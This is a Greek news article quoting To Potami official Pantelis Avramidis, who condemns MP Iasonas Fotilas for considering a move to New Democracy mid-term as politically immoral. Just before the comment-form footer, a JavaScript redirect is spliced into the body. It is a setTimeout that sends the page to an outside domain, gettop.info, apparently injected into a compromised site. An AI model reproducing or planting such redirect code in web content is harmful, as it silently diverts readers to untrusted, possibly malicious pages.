«Πυρά» Αβραμίδη κατά Φωτήλα: Πολιτικά ανήθικο να αλλάζεις κόμμα

0
10

 

Είναι ανήθικο να αλλάζεις κόμμα, κατά την διάρκεια θητείας για την οποία σε ψήφισαν ψηφοφόροι άλλου κόμματος, δήλωσε ο Γραμματέας Οργανωτικού στο Ποτάμι Παντελής Αβραμίδης εξαπολύοντας για άλλη μια φορά τα βέλη του εναντίον του Ιάσονα Φωτήλα, την προτροπή του σε στελέχη του Ποταμιού να προσχωρήσουν στη ΝΔ.

Αναλυτικά η θέση του Παντελή Αβραμίδη όπως δημοσιεύτηκε στα social media:

«Όταν μίλησα για «παλαιοκομματικές πρακτικές», απαντώντας στην «έγκλιση Φωτήλα» να διαλύσουμε το Ποτάμι και να πάμε ένας ένας στην ΝΔ, κάποιοι – ευτυχώς ελάχιστοι – αμφισβήτησαν τον χαρακτηρισμό μου. Πάμε λοιπόν να δούμε αν ισχύει.

Η υφαρπαγή βουλευτών ήταν ένα φαινόμενο της πολιτικής ζωής που έχει συνδεθεί με αρνητικές σελίδες της ιστορίας. Ο τελευταίος που «μεταγράφηκε» ήταν ο βουλευτής Καρακώστας. Εκλέχτηκε το ‘96 με τον κ.Τσοβόλα και κάποια στιγμή προσχώρησε στο κυβερνητικό τότε ΠΑΣΟΚ.

Βέβαια έκτοτε υπήρξαν βουλευτές που ανεξαρτητοποιήθηκαν όπως υπήρξαν και πολιτικοί που στο τέλος μιας κοινοβουλευτικής περιόδου, μεταπήδησαν σε ένα άλλο κόμμα, ποτέ όμως τις δύο τελευταίες δεκαετίες δεν ζήσαμε αυτό που σήμερα ζούμε.

Θυμίζω:

Την Δευτέρα ο Ι.Φωτήλας ρωτήθηκε (στον Βήμα Fm) αν θα πάει στην ΝΔ και απάντησε «το σκέφτομαι» προσθέτοντας ότι «η αυτόνομη πορεία του Ποταμιού έχει τελειώσει». Συνεχίζοντας (στο Κόντρα channel) πρότεινε «όλα τα αξιόλογα στελέχη του Ποταμιού να στραφούμε προς τη ΝΔ», γιατί «ο Μητσοτάκης αυτή τη στιγμή είναι η ελπίδα». Και για να μην μείνει σε κανέναν η αμφιβολία τι εννοεί, την επόμενη μέρα (στο ραδιόφωνο του Σκάι) είπε ότι η συνεργασία δεν μπορεί να γίνει «ως αυτοδύναμες εκλογικές δυνάμεις, αλλά αναγκαστικά μέσα από τα ψηφοδέλτια της ΝΔ».

Τις ίδιες αυτές μέρες κεντρικά στελέχη της ΝΔ αλλά και τοπικοί της παράγοντες στην Αχαΐα, «πανηγύριζαν» που «η παράταξη αποκτά ένα νέο βουλευτή».

Σε όλους αυτούς λοιπόν θέλω να πω ότι στο Ποτάμι θεωρούμε πολιτικά ανήθικο ένας βουλευτής που εκλέχτηκε με τους σταυρούς των υποστηρικτών ενός κόμματος να προσχωρεί σε ένα άλλο κόμμα πριν από τη λήξη της θητείας του. Και είναι διπλά ανήθικο όταν αυτή η ιστορία αφορά ένα μικρό κόμμα και ένα μεγάλο κόμμα. Γιατί πάντα ένα μεγάλο κόμμα έχει την δυνατότητα να «πείσει» έναν βουλευτή ότι στις δικές του λίστες θα έχει ένα πιο σίγουρο μέλλον.

Δεν θέλω να θυμίσω τι έγινε στην ΝΔ το 1980 ή το 1990. Νομίζω – ή νόμιζα- ότι έχουμε φύγει από αυτά. Όμως θα το ξαναπώ: εδώ ευθύνονται δύο. Αυτός που «σκέφτεται να πάει» και αυτός που τον «περιμένει να πάει». Τι σημασία έχει αν αυτό γίνει σε λίγες μέρες ή σε λίγους μήνες; Οι αρχές παραμερίζονται και οι ψηφοφόροι εξαπατώνται. Οι Πατρινοί δεν τον έστειλαν στην Βουλή για να υπερασπιστεί τις αρχές της ΝΔ αλλά της αρχές του δικού μας Κινήματος.

Αυτά λοιπόν είναι τα νέα ήθη; Η διακυβέρνηση των ΣΥΡΙΖΑΝΕΛ μπορεί να έχει θολώσει πολλά στις μέρες μας. Ακόμη βουίζουν στα αυτιά μας οι κορώνες τους για το «ηθικό πλεονέκτημα» ελπίζω να μην ακούσουμε τώρα από εσάς, σύντροφοι της ΝΔ, για το «πολιτικό σας πλεονέκτημα» για το οποίο όλοι πρέπει να θυσιαστούμε». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here